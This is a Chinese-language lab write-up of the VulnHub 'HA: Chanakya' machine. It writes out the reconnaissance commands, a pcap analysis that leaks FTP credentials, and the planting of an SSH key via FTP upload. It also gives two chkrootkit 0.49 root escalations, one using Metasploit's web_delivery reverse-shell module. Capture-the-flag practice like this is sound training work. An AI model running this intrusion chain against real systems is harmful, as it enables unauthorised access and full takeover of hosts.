首页

# Chanakya 靶场笔记

靶场下载:https://www.vulnhub.com/entry/ha-chanakya,395/

# 信息收集

利用 nmap 进行扫描,发现开放了 21,22,80 端口

image-20210820151737064

进一步扫描

1
nmap -n -sV -sC -A 172.16.10.136

image-20210820151927536

# 目录枚举

利用 dirb 进行扫描目录

1
dirb http://172.16.10.136 -X .php,.txt,.html,.xml,.yml,.json

image-20210820152105295

发现存在 abuse.txt,将其下载下来查看,得到一串奇怪字符 nfubxn.cpncat

image-20210820152153462

经过百度分析,发现这是一种 ROT13 的加密方式

1
2
3
ROT13(回转13位)是一种简易的替换式密码算法。它是一种在英文网络论坛用作隐藏八卦、妙句、谜题解答以及某些脏话的工具,目的是逃过版主或管理员的匆匆一瞥。ROT13 也是过去在古罗马开发的凯撒密码的一种变体。ROT13是它自身的逆反,即:要还原成原文只要使用同一算法即可得,故同样的操作可用于加密与解密。该算法并没有提供真正密码学上的保全,故它不应该被用于需要保全的用途上。它常常被当作弱加密示例的典型。
应用ROT13到一段文字上仅仅只需要检查字母顺序并取代它在13位之后的对应字母,有需要超过时则重新绕回26英文字母开头即可。A换成N、B换成O、依此类推到M换成Z,然后串行反转:N换成A、O换成B、最后Z换成M。只有这些出现在英文字母里的字符受影响;数字、符号、空白字符以及所有其他字符都不变。替换后的字母大小写保持不变。
N-A O-B P-C Q-D R-E S-F T-G U-H V-I W-J X-K Y-L Z-M

将其 rot13 进行解密得到 ashoka.pcapng,猜想浏览器存在

image-20210820152640154

尝试浏览器访问,并下载下来,成功得到 ashoka.pcapng 数据包

image-20210820153050614

# 分析数据包

1
2
wireshark ashoka.pcapng 
分析数据包,发现存在大量FTP协议包,成功得到ftp用户和密码

image-20210820153306877

靶机开放了 21 端口,利用 FTP 成功连接,但发现并没有什么有用信息

image-20210820153745039

1
2
3
参考网上,SSH免密登录
显示的内容像是在用户路径下的隐藏文件,该ftp的目录可能就是ashoka用户的目录。而且ftp运行新建文件夹和上传文件。
所以可以设置SSH免密登录,将文件上传到.ssh的文件夹下。

# FTP 渗透(利用 SSH 免密登录)

首先在 kali 生成公钥和私钥

1
2
ssh-keygen 生成
cat id_rsa.pub > authorized_keys  更改名字

image-20210820154317504

利用 FTP 将公钥进行上传到靶机上,成功上传

1
2
3
4
lcd /root/.ssh
mkdir .ssh
cd .ssh
put authorized_keys

image-20210820155656817

下面直接利用 ssh 进行连接 ashoka(免密登录)

image-20210820155720343

# 提权(Chkrootkit)

1
2
思路:
我们得到了 ashoka 用户的权限。经过一些枚举,我们看到临时文件/tmp中有一个日志文件。我们尝试使用 cat 命令查看它。它绝对看起来像 Chkrootkit 测试结果日志,这是我们可以使用 Chkrootkit 在这台机器上提升权限的线索。

# 提权一(执行脚本)

发现可以利用本地 Chkrootkit 进行提权

image-20210820155932366

进一步查看 Chkrootkit 权限

1
2
3
4
find / -name chkrootkit* 2>/dev/null
cd /usr/local/share/chkrootkit
./chkrootkit -V  
发现此版本确实存在提权漏洞,Chkrootkit0.49以及以下版本均存在本地提权漏洞,只要提权上传一个文件到tmp目录,管理员再次运行Chkrootkit后,即可获取root权限

image-20210820160200147

image-20210820160305476

所以,在 kali 中新建一个 update.c 的文件,并写入下面的数据。

image-20210820160703494

将其上传到靶机上进行编译和执行

1
2
3
cd /tmp
gcc update.c -o update
./update

image-20210820161039785

这里我刚拷 update 进去不一会就变成 root 了,等 待一会运行./update

image-20210820161130008

# 提权二(模块提权)

1
2
3
思路:用到两个模块,反弹模块和提权Chkrootkit模块
use exploit/multi/script/web_delivery
use exploit/unix/local/chkrootkit

首先,利用反弹 shell 模块,为我们提供一个在目标机器上的 meterpreter。

1
2
3
4
5
6
search web_de
use exploit/multi/script/web_delivery
set lhost 本地IP
set lport 监听端口
set uripath 指定url
exploit 生成

image-20210820161733723

将生成的命令,复制到靶机进行粘贴,成功反弹 ashoka 用户的权限

image-20210820161946891

下面进行提权模块利用,成功利用 Chkrootkit 模块提权 root

1
2
3
4
5
background
search chkrootkit
use exploit/unix/local/chkrootkit
set sessions 1
exploit

image-20210820162651032

更新于

请我喝[茶]~( ̄▽ ̄)~*

chun 微信支付

微信支付

chun 支付宝

支付宝